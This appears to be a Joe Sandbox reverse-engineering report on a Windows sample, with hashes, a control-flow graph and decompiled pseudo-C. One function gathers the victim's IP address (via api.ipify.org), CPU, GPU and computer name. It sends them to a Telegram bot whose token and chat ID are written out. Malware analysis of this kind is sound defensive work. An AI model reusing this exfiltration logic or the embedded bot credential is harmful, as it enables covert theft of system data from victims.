                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7191b0000_DllHost.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: cb359d88ecc6b2b97fafaf1dc73106174eaee633e760dd461434d3ccaf5b8b86
                                                                                                                                                              • Instruction ID: 043de26a04c03d5b194f504d5c756bb046a7f039f196ba1e07313fc868a7a1b0
                                                                                                                                                              • Opcode Fuzzy Hash: cb359d88ecc6b2b97fafaf1dc73106174eaee633e760dd461434d3ccaf5b8b86
                                                                                                                                                              • Instruction Fuzzy Hash: C752F272F18A9285FB109F65E8442EDA7B0FB44BACF804035DE4D63A49EF78D58AD340
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF7191C7C20 Relevance: .3, Instructions: 292COMMONCrypto
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E00007FF77FF7191C7C20(void* __rcx) {
				intOrPtr* _t7;
				void* _t10;

				r12d = 0;
				r15d = r12d;
				if (__rcx == 0) goto 0x191c80ff;
				_t7 =  *((intOrPtr*)(__rcx + 0x150));
				if (_t7 == 0) goto 0x191c80ff;
				if ( *_t7 != _t10) goto 0x191c7c60;
				_t2 = _t10 - 0x64; // -100
				return _t2;
			}





                                                                                                                                                              0x7ff7191c7c2a
                                                                                                                                                              0x7ff7191c7c30
                                                                                                                                                              0x7ff7191c7c36
                                                                                                                                                              0x7ff7191c7c3c
                                                                                                                                                              0x7ff7191c7c46
                                                                                                                                                              0x7ff7191c7c4f
                                                                                                                                                              0x7ff7191c7c51
                                                                                                                                                              0x7ff7191c7c5f

                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.428644397.00007FF7191B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7191B0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.428609123.00007FF7191B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.428983420.00007FF7191F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429183330.00007FF719219000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429226699.00007FF71921C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7191b0000_DllHost.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 5da41823c5da915dc7ea34fb18f032980750e733c93ab511437396c8bbe97b79
                                                                                                                                                              • Instruction ID: b295c2ac944a2dfd8b958ddf6c78e1e9c2119ba4ab38ddb1c53b9dcd2c625db4
                                                                                                                                                              • Opcode Fuzzy Hash: 5da41823c5da915dc7ea34fb18f032980750e733c93ab511437396c8bbe97b79
                                                                                                                                                              • Instruction Fuzzy Hash: B4D18B32614E95C6EB109F69D8882ADB7B0FB88FA9F494136CE0C4B764CF35D496D360
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF7191BEEB0 Relevance: 39.0, APIs: 14, Strings: 8, Instructions: 500stringCOMMON
                                                                                                                                                              Download Yara Rule

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 40 7ff7191beeb0-7ff7191bef78 call 7ff7191d2690 * 2 call 7ff7191ba9a0 call 7ff7191bdd20 call 7ff7191bdfe0 51 7ff7191befdf-7ff7191bf014 lstrcpyA GetComputerNameW 40->51 52 7ff7191bef7a 40->52 54 7ff7191bf09f-7ff7191bf0b0 51->54 55 7ff7191bf01a-7ff7191bf07b call 7ff7191bdc50 51->55 53 7ff7191bef80-7ff7191bef9e 52->53 57 7ff7191befa0-7ff7191befa9 53->57 58 7ff7191befab-7ff7191befb2 53->58 56 7ff7191bf0b5-7ff7191bf130 call 7ff7191ba9a0 * 2 54->56 67 7ff7191bf082-7ff7191bf08a 55->67 72 7ff7191bf132-7ff7191bf154 56->72 73 7ff7191bf1ae-7ff7191bf1c6 call 7ff7191bfa10 56->73 61 7ff7191befd7-7ff7191befdd 57->61 62 7ff7191befc2-7ff7191befc9 58->62 63 7ff7191befb4-7ff7191befc0 58->63 61->51 61->53 62->61 66 7ff7191befcb-7ff7191befd0 62->66 63->61 66->61 67->67 69 7ff7191bf08c-7ff7191bf09d call 7ff7191ba9a0 67->69 69->56 76 7ff7191bf171 72->76 77 7ff7191bf156-7ff7191bf15d 72->77 78 7ff7191bf1cb-7ff7191bf28a call 7ff7191bab00 call 7ff7191bf820 call 7ff7191bab00 call 7ff7191bf820 73->78 80 7ff7191bf174-7ff7191bf1ac call 7ff7191d4380 * 3 76->80 77->76 79 7ff7191bf15f-7ff7191bf162 77->79 97 7ff7191bf2be-7ff7191bf2c6 78->97 98 7ff7191bf28c-7ff7191bf29d 78->98 82 7ff7191bf164-7ff7191bf167 79->82 83 7ff7191bf169-7ff7191bf16f 79->83 80->78 82->80 83->80 99 7ff7191bf2f9-7ff7191bf311 97->99 100 7ff7191bf2c8-7ff7191bf2d9 97->100 101 7ff7191bf29f-7ff7191bf2b2 98->101 102 7ff7191bf2b8-7ff7191bf2bd call 7ff7191d23d0 98->102 107 7ff7191bf345-7ff7191bf34d 99->107 108 7ff7191bf313-7ff7191bf324 99->108 105 7ff7191bf2f4 call 7ff7191d23d0 100->105 106 7ff7191bf2db-7ff7191bf2ee 100->106 101->102 103 7ff7191bf66e-7ff7191bf673 call 7ff7191da5f8 101->103 102->97 110 7ff7191bf674-7ff7191bf679 call 7ff7191da5f8 103->110 105->99 106->105 106->110 115 7ff7191bf380-7ff7191bf399 107->115 116 7ff7191bf34f-7ff7191bf360 107->116 113 7ff7191bf33f-7ff7191bf344 call 7ff7191d23d0 108->113 114 7ff7191bf326-7ff7191bf339 108->114 123 7ff7191bf67a-7ff7191bf67f call 7ff7191da5f8 110->123 113->107 114->113 114->123 119 7ff7191bf3cd-7ff7191bf3e8 115->119 120 7ff7191bf39b-7ff7191bf3ad 115->120 117 7ff7191bf362-7ff7191bf375 116->117 118 7ff7191bf37b call 7ff7191d23d0 116->118 117->118 125 7ff7191bf680-7ff7191bf685 call 7ff7191da5f8 117->125 118->115 129 7ff7191bf3ea-7ff7191bf3fb 119->129 130 7ff7191bf41c-7ff7191bf424 119->130 127 7ff7191bf3af-7ff7191bf3c2 120->127 128 7ff7191bf3c8 call 7ff7191d23d0 120->128 123->125 135 7ff7191bf686-7ff7191bf68b call 7ff7191da5f8 125->135 127->128 127->135 128->119 137 7ff7191bf416-7ff7191bf41b call 7ff7191d23d0 129->137 138 7ff7191bf3fd-7ff7191bf410 129->138 140 7ff7191bf426-7ff7191bf438 130->140 141 7ff7191bf458-7ff7191bf48b 130->141 148 7ff7191bf68c-7ff7191bf691 call 7ff7191da5f8 135->148 137->130 138->137 138->148 142 7ff7191bf453 call 7ff7191d23d0 140->142 143 7ff7191bf43a-7ff7191bf44d 140->143 146 7ff7191bf4a0-7ff7191bf4c3 141->146 147 7ff7191bf48d-7ff7191bf49e 141->147 142->141 143->142 150 7ff7191bf692-7ff7191bf697 call 7ff7191da5f8 143->150 154 7ff7191bf4f1-7ff7191bf4f4 146->154 155 7ff7191bf4c5-7ff7191bf4cc 146->155 153 7ff7191bf516-7ff7191bf53a call 7ff7191b9e00 call 7ff7191bdd20 147->153 148->150 160 7ff7191bf698-7ff7191bf69d call 7ff7191b1260 150->160 176 7ff7191bf53f-7ff7191bf547 153->176 163 7ff7191bf4f6-7ff7191bf4fb call 7ff7191d23d8 154->163 164 7ff7191bf4fe-7ff7191bf512 call 7ff7191d4380 154->164 159 7ff7191bf4d2-7ff7191bf4dd call 7ff7191d23d8 155->159 155->160 177 7ff7191bf6a4-7ff7191bf6a9 call 7ff7191da5f8 159->177 178 7ff7191bf4e3-7ff7191bf4ef 159->178 179 7ff7191bf69e-7ff7191bf6a3 call 7ff7191da5f8 160->179 163->164 164->153 181 7ff7191bf549-7ff7191bf55a 176->181 182 7ff7191bf57b-7ff7191bf583 176->182 191 7ff7191bf6aa-7ff7191bf6af call 7ff7191da5f8 177->191 178->164 179->177 186 7ff7191bf575-7ff7191bf57a call 7ff7191d23d0 181->186 187 7ff7191bf55c-7ff7191bf56f 181->187 188 7ff7191bf585-7ff7191bf597 182->188 189 7ff7191bf5b7-7ff7191bf5cd call 7ff7191d23d0 * 2 182->189 186->182 187->179 187->186 193 7ff7191bf5b2 call 7ff7191d23d0 188->193 194 7ff7191bf599-7ff7191bf5ac 188->194 202 7ff7191bf601-7ff7191bf609 189->202 203 7ff7191bf5cf-7ff7191bf5dd 189->203 193->189 194->177 194->193 206 7ff7191bf638-7ff7191bf667 call 7ff7191d23b0 202->206 207 7ff7191bf60b-7ff7191bf61c 202->207 204 7ff7191bf5df-7ff7191bf5f2 203->204 205 7ff7191bf5f8-7ff7191bf600 call 7ff7191d23d0 203->205 204->191 204->205 205->202 210 7ff7191bf633 call 7ff7191d23d0 207->210 211 7ff7191bf61e-7ff7191bf631 207->211 210->206 211->210 214 7ff7191bf668-7ff7191bf66d call 7ff7191da5f8 211->214 214->103
                                                                                                                                                              C-Code - Quality: 22%
                                                                                                                                                              			E00007FF77FF7191BEEB0(intOrPtr __ebx, void* __esi, void* __eflags, long long __rbx, signed long long __rdi, long long __rsi, void* __r8) {
				void* __rbp;
				void* __r13;
				void* __r15;
				void* _t175;
				intOrPtr _t177;
				intOrPtr _t182;
				signed long long _t242;
				signed long long _t243;
				char* _t251;
				signed long long _t274;
				void* _t292;
				intOrPtr _t293;
				void* _t328;
				signed long long _t329;
				intOrPtr _t357;
				intOrPtr _t360;
				intOrPtr _t363;
				signed long long _t366;
				intOrPtr _t369;
				intOrPtr _t372;
				signed long long _t375;
				void* _t378;
				intOrPtr _t380;
				signed long long _t383;
				intOrPtr _t388;
				signed long long _t391;
				signed long long _t397;
				signed long long _t404;
				void* _t406;
				char* _t407;
				void* _t409;
				signed long long _t410;
				signed long long _t417;
				void* _t429;
				void* _t431;
				intOrPtr _t432;
				WCHAR* _t434;
				signed long long _t435;
				long long _t436;
				signed long long _t437;
				CHAR* _t439;

				_t391 = __rdi;
				_t288 = __rbx;
				_t177 = __ebx;
				 *((long long*)(_t409 + 8)) = __rbx;
				 *((long long*)(_t409 + 0x10)) = __rsi;
				 *((long long*)(_t409 + 0x18)) = __rdi;
				_t407 = _t409 - 0x3e0;
				_t410 = _t409 - 0x4e0;
				_t242 =  *0x192190a0; // 0x590452ce5669
				_t243 = _t242 ^ _t410;
				 *(_t407 + 0x3d0) = _t243;
				0x191d2690();
				_t435 = _t243;
				 *(_t407 - 0x30) = _t243;
				0x191d2690();
				_t397 = _t243;
				 *(_t407 - 0x28) = _t243;
				 *((long long*)(_t407 - 0x70)) = __rdi;
				 *((long long*)(_t407 - 0x60)) = __rdi;
				 *((long long*)(_t407 - 0x58)) = 0xf;
				_t11 = _t391 + 0x16; // 0x16
				r8d = _t11;
				E00007FF77FF7191BA9A0(_t407 - 0x70, "https://api.ipify.org/", __r8);
				_t14 = _t391 + 1; // 0x1
				_t182 = _t14;
				E00007FF77FF7191BDD20(_t182, __rbx, _t407 + 0x48, _t407 - 0x70); // executed
				E00007FF77FF7191BDFE0(_t288, _t435, _t397); // executed
				asm("movdqa xmm0, [0x51b6f]");
				asm("movdqu [esp+0x50], xmm0");
				asm("cpuid");
				r9d = 0x80000000;
				 *((intOrPtr*)(_t410 + 0x54)) = _t177;
				 *((intOrPtr*)(_t410 + 0x58)) = 0;
				 *((intOrPtr*)(_t410 + 0x5c)) = _t182;
				r8d = 0x80000000;
				if (0x80000000 - r8d < 0) goto 0x191befdf;
				asm("o16 nop [eax+eax]");
				asm("cpuid");
				 *((intOrPtr*)(_t410 + 0x50)) = r8d;
				 *((intOrPtr*)(_t410 + 0x54)) = _t177;
				 *((intOrPtr*)(_t410 + 0x58)) = 0;
				 *((intOrPtr*)(_t410 + 0x5c)) = _t182;
				if (r8d != 0x80000002) goto 0x191befab;
				asm("movups xmm0, [esp+0x50]");
				asm("movaps [ebp+0x70], xmm0");
				goto 0x191befd7;
				if (r8d != 0x80000003) goto 0x191befc2;
				asm("movups xmm0, [esp+0x50]");
				asm("movaps [ebp+0x80], xmm0");
				goto 0x191befd7;
				if (r8d != 0x80000004) goto 0x191befd7;
				asm("movups xmm0, [esp+0x50]");
				asm("movaps [ebp+0x90], xmm0");
				r8d = r8d + 1;
				if (r8d - r9d <= 0) goto 0x191bef80;
				lstrcpyA(_t439);
				_t290 =  >=  ?  *((void*)(_t407 + 0x48)) : _t407 + 0x48;
				 *((intOrPtr*)(_t407 + 0x40)) = 0x104;
				if (GetComputerNameW(_t434) == 0) goto 0x191bf09f;
				 *((long long*)(_t410 + 0x48)) =  >=  ?  *((void*)(_t407 + 0x48)) : _t407 + 0x48;
				 *((long long*)(_t410 + 0x40)) = 0x19210aa8;
				 *(_t410 + 0x38) = _t435;
				 *((long long*)(_t410 + 0x30)) = 0x19210aa8;
				 *(_t410 + 0x28) = _t397;
				 *((long long*)(_t410 + 0x20)) = 0x19210aa8;
				E00007FF77FF7191BDC50(0x19210aa8, _t407 + 0xb0, _t407 + 0x40, "New User: %ws%sCPU: %s%sGPU: %s%sIP: %s", _t407 + 0x1c0, _t431);
				 *(_t410 + 0x70) = __rdi;
				 *(_t407 - 0x80) = __rdi;
				 *(_t407 - 0x78) = 0xf;
				 *(_t410 + 0x70) = 0;
				if ( *((char*)(_t407 + 0xaf)) != 0) goto 0x191bf082;
				E00007FF77FF7191BA9A0(_t410 + 0x70, _t407 + 0xb0, 0);
				goto 0x191bf0b5;
				 *(_t410 + 0x70) = __rdi;
				 *(_t407 - 0x80) = __rdi;
				 *(_t407 - 0x78) = 0xf;
				 *(_t410 + 0x70) = 0;
				 *((long long*)(_t407 - 0x70)) = __rdi;
				 *((long long*)(_t407 - 0x60)) = __rdi;
				 *((long long*)(_t407 - 0x58)) = 0xf;
				 *((char*)(_t407 - 0x70)) = 0;
				r8d = 0xa;
				E00007FF77FF7191BA9A0(_t407 - 0x70, "1327052997", 0);
				 *((long long*)(_t410 + 0x50)) = __rdi;
				 *(_t410 + 0x60) = __rdi;
				 *((long long*)(_t410 + 0x68)) = 0xf;
				 *((char*)(_t410 + 0x50)) = 0;
				r8d = 0x2e;
				E00007FF77FF7191BA9A0(_t410 + 0x50, "5468819057:AAHRJabfvGnrMiNkuZj9RaE8-OjfRBxOw-4", 0);
				_t417 =  *(_t410 + 0x60);
				r15d = 0x1c;
				_t436 = "https://api.telegram.org/bot";
				if ( *((intOrPtr*)(_t410 + 0x68)) - _t417 - _t439 < 0) goto 0x191bf1ae;
				 *(_t410 + 0x60) = _t417 + 0x1c;
				_t292 =  >=  ?  *((void*)(_t410 + 0x50)) : _t410 + 0x50;
				if (0x19210aa4 - _t292 <= 0) goto 0x191bf171;
				if (_t436 - _t292 + _t417 > 0) goto 0x191bf171;
				if (_t292 - _t436 > 0) goto 0x191bf169;
				goto 0x191bf174;
				goto 0x191bf174;
				E00007FF77FF7191D4380();
				E00007FF77FF7191D4380();
				E00007FF77FF7191D4380();
				_t251 = _t410 + 0x50;
				goto 0x191bf1cb;
				 *(_t410 + 0x28) = _t439 - _t439;
				 *((long long*)(_t410 + 0x20)) = _t436;
				r9d = 0;
				r8d = 0;
				E00007FF77FF7191BFA10(_t410 + 0x50, _t439 - _t439, __rdi, _t407 + 0x1c0, _t431, _t439 - _t439);
				 *(_t407 - 0x50) = _t391;
				 *(_t407 - 0x40) = _t391;
				 *(_t407 - 0x38) = _t391;
				asm("movups xmm0, [eax]");
				asm("movups [ebp-0x50], xmm0");
				asm("movups xmm1, [eax+0x10]");
				asm("movups [ebp-0x40], xmm1");
				 *(_t251 + 0x10) = _t391;
				 *((long long*)(_t251 + 0x18)) = 0xf;
				 *_t251 = 0;
				r8d = 0x15;
				E00007FF77FF7191BAB00(_t292, _t407 - 0x50, _t439, _t439 - _t439, _t429);
				asm("movups xmm0, [eax]");
				asm("movups [ebp-0x20], xmm0");
				asm("movups xmm1, [eax+0x10]");
				asm("movups [ebp-0x10], xmm1");
				 *(_t251 + 0x10) = _t391;
				 *((long long*)(_t251 + 0x18)) = 0xf;
				 *_t251 = 0;
				E00007FF77FF7191BF820(_t292, _t407, _t407 - 0x20, _t407 - 0x70);
				r8d = 6;
				E00007FF77FF7191BAB00(_t292, _t407, _t439, _t407 - 0x20, _t406);
				asm("movups xmm0, [eax]");
				asm("movups [ebp+0x20], xmm0");
				asm("movups xmm1, [eax+0x10]");
				asm("movups [ebp+0x30], xmm1");
				 *(_t251 + 0x10) = _t391;
				 *((long long*)(_t251 + 0x18)) = 0xf;
				 *_t251 = 0;
				E00007FF77FF7191BF820(_t292, _t407 + 0x70, _t407 + 0x20, _t410 + 0x70);
				_t357 =  *((intOrPtr*)(_t407 + 0x38));
				if (_t357 - 0x10 < 0) goto 0x191bf2be;
				if (_t357 + 1 - 0x1000 < 0) goto 0x191bf2b8;
				if ( *((intOrPtr*)(_t407 + 0x20)) -  *((intOrPtr*)( *((intOrPtr*)(_t407 + 0x20)) - 8)) + 0xfffffff8 - 0x1f > 0) goto 0x191bf66e;
				0x191d23d0();
				_t360 =  *((intOrPtr*)(_t407 + 0x18));
				if (_t360 - 0x10 < 0) goto 0x191bf2f9;
				if (_t360 + 1 - 0x1000 < 0) goto 0x191bf2f4;
				if ( *_t407 -  *((intOrPtr*)( *_t407 - 8)) + 0xfffffff8 - 0x1f > 0) goto 0x191bf674;
				0x191d23d0();
				 *(_t407 + 0x10) = _t391;
				 *((long long*)(_t407 + 0x18)) = 0xf;
				 *_t407 = 0;
				_t363 =  *((intOrPtr*)(_t407 - 8));
				if (_t363 - 0x10 < 0) goto 0x191bf345;
				if (_t363 + 1 - 0x1000 < 0) goto 0x191bf33f;
				if ( *((intOrPtr*)(_t407 - 0x20)) -  *((intOrPtr*)( *((intOrPtr*)(_t407 - 0x20)) - 8)) + 0xfffffff8 - 0x1f > 0) goto 0x191bf67a;
				0x191d23d0();
				_t366 =  *(_t407 - 0x38);
				if (_t366 - 0x10 < 0) goto 0x191bf380;
				if (_t366 + 1 - 0x1000 < 0) goto 0x191bf37b;
				if ( *(_t407 - 0x50) -  *((intOrPtr*)( *(_t407 - 0x50) - 8)) + 0xfffffff8 - 0x1f > 0) goto 0x191bf680;
				0x191d23d0();
				 *(_t407 - 0x40) = _t391;
				 *(_t407 - 0x38) = 0xf;
				 *(_t407 - 0x50) = 0;
				_t369 =  *((intOrPtr*)(_t410 + 0x68));
				if (_t369 - 0x10 < 0) goto 0x191bf3cd;
				if (_t369 + 1 - 0x1000 < 0) goto 0x191bf3c8;
				if ( *((intOrPtr*)(_t410 + 0x50)) -  *((intOrPtr*)( *((intOrPtr*)(_t410 + 0x50)) - 8)) + 0xfffffff8 - 0x1f > 0) goto 0x191bf686;
				0x191d23d0();
				 *(_t410 + 0x60) = _t391;
				 *((long long*)(_t410 + 0x68)) = 0xf;
				 *((char*)(_t410 + 0x50)) = 0;
				_t372 =  *((intOrPtr*)(_t407 - 0x58));
				if (_t372 - 0x10 < 0) goto 0x191bf41c;
				if (_t372 + 1 - 0x1000 < 0) goto 0x191bf416;
				if ( *((intOrPtr*)(_t407 - 0x70)) -  *((intOrPtr*)( *((intOrPtr*)(_t407 - 0x70)) - 8)) + 0xfffffff8 - 0x1f > 0) goto 0x191bf68c;
				0x191d23d0();
				_t375 =  *(_t407 - 0x78);
				if (_t375 - 0x10 < 0) goto 0x191bf458;
				if (_t375 + 1 - 0x1000 < 0) goto 0x191bf453;
				if ( *(_t410 + 0x70) -  *((intOrPtr*)( *(_t410 + 0x70) - 8)) + 0xfffffff8 - 0x1f > 0) goto 0x191bf692;
				0x191d23d0();
				 *(_t410 + 0x70) = _t391;
				 *(_t407 - 0x80) = _t391;
				 *(_t407 - 0x78) = _t391;
				_t432 =  *((intOrPtr*)(_t407 + 0x88));
				r12b = _t432 - 0x10 >= 0;
				_t293 =  *((intOrPtr*)(_t407 + 0x70));
				_t442 =  >=  ? _t293 : _t407 + 0x70;
				_t437 =  *((intOrPtr*)(_t407 + 0x80));
				if (_t437 - 0x10 >= 0) goto 0x191bf4a0;
				asm("inc ecx");
				asm("movups [esp+0x70], xmm0");
				 *(_t407 - 0x78) = 0xf;
				goto 0x191bf516;
				_t404 =  >  ? 0xffffffff : _t437 | 0x0000000f;
				_t328 = _t404 + 1;
				if (_t328 - 0x1000 < 0) goto 0x191bf4f1;
				_t274 = _t328 + 0x27;
				if (_t274 - _t328 <= 0) goto 0x191bf698;
				_t329 = _t274;
				E00007FF77FF7191D23D8(_t274, _t329);
				if (_t274 == 0) goto 0x191bf6a4;
				_t127 = _t274 + 0x27; // 0x27
				 *((_t127 & 0xffffffe0) - 8) = _t274;
				goto 0x191bf4fe;
				if (_t329 == 0) goto 0x191bf4fe;
				E00007FF77FF7191D23D8(_t274, _t329);
				 *(_t410 + 0x70) = _t274;
				_t378 =  >=  ? _t293 : _t407 + 0x70;
				E00007FF77FF7191D4380();
				 *(_t407 - 0x78) = _t404;
				 *(_t407 - 0x80) = _t437;
				 *((long long*)(_t407 + 0x40)) = _t410 + 0x70;
				E00007FF77FF7191B9E00(_t410 + 0x70, _t293, _t407 + 0x20, _t410 + 0x70, _t404);
				_t175 = E00007FF77FF7191BDD20(0, _t293, _t407 - 0x20, _t410 + 0x70); // executed
				_t380 =  *((intOrPtr*)(_t407 - 8));
				if (_t380 - 0x10 < 0) goto 0x191bf57b;
				if (_t380 + 1 - 0x1000 < 0) goto 0x191bf575;
				if ( *((intOrPtr*)(_t407 - 0x20)) -  *((intOrPtr*)( *((intOrPtr*)(_t407 - 0x20)) - 8)) + 0xfffffff8 - 0x1f > 0) goto 0x191bf69e;
				0x191d23d0();
				_t383 =  *(_t407 - 0x78);
				if (_t383 - 0x10 < 0) goto 0x191bf5b7;
				if (_t383 + 1 - 0x1000 < 0) goto 0x191bf5b2;
				if ( *(_t410 + 0x70) -  *((intOrPtr*)( *(_t410 + 0x70) - 8)) + 0xfffffff8 - 0x1f > 0) goto 0x191bf6a4;
				0x191d23d0();
				0x191d23d0();
				0x191d23d0();
				if (r12b == 0) goto 0x191bf601;
				if (_t432 + 1 - 0x1000 < 0) goto 0x191bf5f8;
				if (_t293 -  *((intOrPtr*)(_t293 - 8)) + 0xfffffff8 - 0x1f > 0) goto 0x191bf6aa;
				0x191d23d0();
				_t388 =  *((intOrPtr*)(_t407 + 0x60));
				if (_t388 - 0x10 < 0) goto 0x191bf638;
				if (_t388 + 1 - 0x1000 < 0) goto 0x191bf633;
				if ( *((intOrPtr*)(_t407 + 0x48)) -  *((intOrPtr*)( *((intOrPtr*)(_t407 + 0x48)) - 8)) + 0xfffffff8 - 0x1f > 0) goto 0x191bf668;
				0x191d23d0();
				return E00007FF77FF7191D23B0(_t175, 0,  *(_t407 + 0x3d0) ^ _t410);
			}












































                                                                                                                                                              0x7ff7191beeb0
                                                                                                                                                              0x7ff7191beeb0
                                                                                                                                                              0x7ff7191beeb0
                                                                                                                                                              0x7ff7191beeb0
                                                                                                                                                              0x7ff7191beeb5
                                                                                                                                                              0x7ff7191beeba
                                                                                                                                                              0x7ff7191beec8
                                                                                                                                                              0x7ff7191beed0
                                                                                                                                                              0x7ff7191beed7
                                                                                                                                                              0x7ff7191beede
                                                                                                                                                              0x7ff7191beee1
                                                                                                                                                              0x7ff7191beeed
                                                                                                                                                              0x7ff7191beef2
                                                                                                                                                              0x7ff7191beef5
                                                                                                                                                              0x7ff7191beefe
                                                                                                                                                              0x7ff7191bef03
                                                                                                                                                              0x7ff7191bef06
                                                                                                                                                              0x7ff7191bef0c
                                                                                                                                                              0x7ff7191bef10
                                                                                                                                                              0x7ff7191bef14
                                                                                                                                                              0x7ff7191bef1c
                                                                                                                                                              0x7ff7191bef1c
                                                                                                                                                              0x7ff7191bef2b
                                                                                                                                                              0x7ff7191bef34
                                                                                                                                                              0x7ff7191bef34
                                                                                                                                                              0x7ff7191bef3b
                                                                                                                                                              0x7ff7191bef44
                                                                                                                                                              0x7ff7191bef49
                                                                                                                                                              0x7ff7191bef51
                                                                                                                                                              0x7ff7191bef5e
                                                                                                                                                              0x7ff7191bef60
                                                                                                                                                              0x7ff7191bef63
                                                                                                                                                              0x7ff7191bef67
                                                                                                                                                              0x7ff7191bef6b
                                                                                                                                                              0x7ff7191bef6f
                                                                                                                                                              0x7ff7191bef78
                                                                                                                                                              0x7ff7191bef7a
                                                                                                                                                              0x7ff7191bef85
                                                                                                                                                              0x7ff7191bef87
                                                                                                                                                              0x7ff7191bef8b
                                                                                                                                                              0x7ff7191bef8f
                                                                                                                                                              0x7ff7191bef93
                                                                                                                                                              0x7ff7191bef9e
                                                                                                                                                              0x7ff7191befa0
                                                                                                                                                              0x7ff7191befa5
                                                                                                                                                              0x7ff7191befa9
                                                                                                                                                              0x7ff7191befb2
                                                                                                                                                              0x7ff7191befb4
                                                                                                                                                              0x7ff7191befb9
                                                                                                                                                              0x7ff7191befc0
                                                                                                                                                              0x7ff7191befc9
                                                                                                                                                              0x7ff7191befcb
                                                                                                                                                              0x7ff7191befd0
                                                                                                                                                              0x7ff7191befd7
                                                                                                                                                              0x7ff7191befdd
                                                                                                                                                              0x7ff7191befe6
                                                                                                                                                              0x7ff7191beff5
                                                                                                                                                              0x7ff7191beffa
                                                                                                                                                              0x7ff7191bf014
                                                                                                                                                              0x7ff7191bf01a
                                                                                                                                                              0x7ff7191bf026
                                                                                                                                                              0x7ff7191bf02b
                                                                                                                                                              0x7ff7191bf030
                                                                                                                                                              0x7ff7191bf035
                                                                                                                                                              0x7ff7191bf03a
                                                                                                                                                              0x7ff7191bf059
                                                                                                                                                              0x7ff7191bf05e
                                                                                                                                                              0x7ff7191bf063
                                                                                                                                                              0x7ff7191bf067
                                                                                                                                                              0x7ff7191bf06f
                                                                                                                                                              0x7ff7191bf08a
                                                                                                                                                              0x7ff7191bf098
                                                                                                                                                              0x7ff7191bf09d
                                                                                                                                                              0x7ff7191bf09f
                                                                                                                                                              0x7ff7191bf0a4
                                                                                                                                                              0x7ff7191bf0a8
                                                                                                                                                              0x7ff7191bf0b0
                                                                                                                                                              0x7ff7191bf0b5
                                                                                                                                                              0x7ff7191bf0b9
                                                                                                                                                              0x7ff7191bf0bd
                                                                                                                                                              0x7ff7191bf0c5
                                                                                                                                                              0x7ff7191bf0c9
                                                                                                                                                              0x7ff7191bf0da
                                                                                                                                                              0x7ff7191bf0e0
                                                                                                                                                              0x7ff7191bf0e5
                                                                                                                                                              0x7ff7191bf0ea
                                                                                                                                                              0x7ff7191bf0f3
                                                                                                                                                              0x7ff7191bf0f8
                                                                                                                                                              0x7ff7191bf10a
                                                                                                                                                              0x7ff7191bf110
                                                                                                                                                              0x7ff7191bf120
                                                                                                                                                              0x7ff7191bf126
                                                                                                                                                              0x7ff7191bf130
                                                                                                                                                              0x7ff7191bf136
                                                                                                                                                              0x7ff7191bf144
                                                                                                                                                              0x7ff7191bf154
                                                                                                                                                              0x7ff7191bf15d
                                                                                                                                                              0x7ff7191bf162
                                                                                                                                                              0x7ff7191bf167
                                                                                                                                                              0x7ff7191bf16f
                                                                                                                                                              0x7ff7191bf17e
                                                                                                                                                              0x7ff7191bf18c
                                                                                                                                                              0x7ff7191bf1a2
                                                                                                                                                              0x7ff7191bf1a7
                                                                                                                                                              0x7ff7191bf1ac
                                                                                                                                                              0x7ff7191bf1ae
                                                                                                                                                              0x7ff7191bf1b3
                                                                                                                                                              0x7ff7191bf1b8
                                                                                                                                                              0x7ff7191bf1bb
                                                                                                                                                              0x7ff7191bf1c6
                                                                                                                                                              0x7ff7191bf1cb
                                                                                                                                                              0x7ff7191bf1cf
                                                                                                                                                              0x7ff7191bf1d3
                                                                                                                                                              0x7ff7191bf1d7
                                                                                                                                                              0x7ff7191bf1da
                                                                                                                                                              0x7ff7191bf1de
                                                                                                                                                              0x7ff7191bf1e2
                                                                                                                                                              0x7ff7191bf1e6
                                                                                                                                                              0x7ff7191bf1ea
                                                                                                                                                              0x7ff7191bf1f2
                                                                                                                                                              0x7ff7191bf1f5
                                                                                                                                                              0x7ff7191bf206
                                                                                                                                                              0x7ff7191bf20b
                                                                                                                                                              0x7ff7191bf20e
                                                                                                                                                              0x7ff7191bf212
                                                                                                                                                              0x7ff7191bf216
                                                                                                                                                              0x7ff7191bf21a
                                                                                                                                                              0x7ff7191bf21e
                                                                                                                                                              0x7ff7191bf226
                                                                                                                                                              0x7ff7191bf235
                                                                                                                                                              0x7ff7191bf23b
                                                                                                                                                              0x7ff7191bf24c
                                                                                                                                                              0x7ff7191bf251
                                                                                                                                                              0x7ff7191bf254
                                                                                                                                                              0x7ff7191bf258
                                                                                                                                                              0x7ff7191bf25c
                                                                                                                                                              0x7ff7191bf260
                                                                                                                                                              0x7ff7191bf264
                                                                                                                                                              0x7ff7191bf26c
                                                                                                                                                              0x7ff7191bf27c
                                                                                                                                                              0x7ff7191bf282
                                                                                                                                                              0x7ff7191bf28a
                                                                                                                                                              0x7ff7191bf29d
                                                                                                                                                              0x7ff7191bf2b2
                                                                                                                                                              0x7ff7191bf2b8
                                                                                                                                                              0x7ff7191bf2be
                                                                                                                                                              0x7ff7191bf2c6
                                                                                                                                                              0x7ff7191bf2d9
                                                                                                                                                              0x7ff7191bf2ee
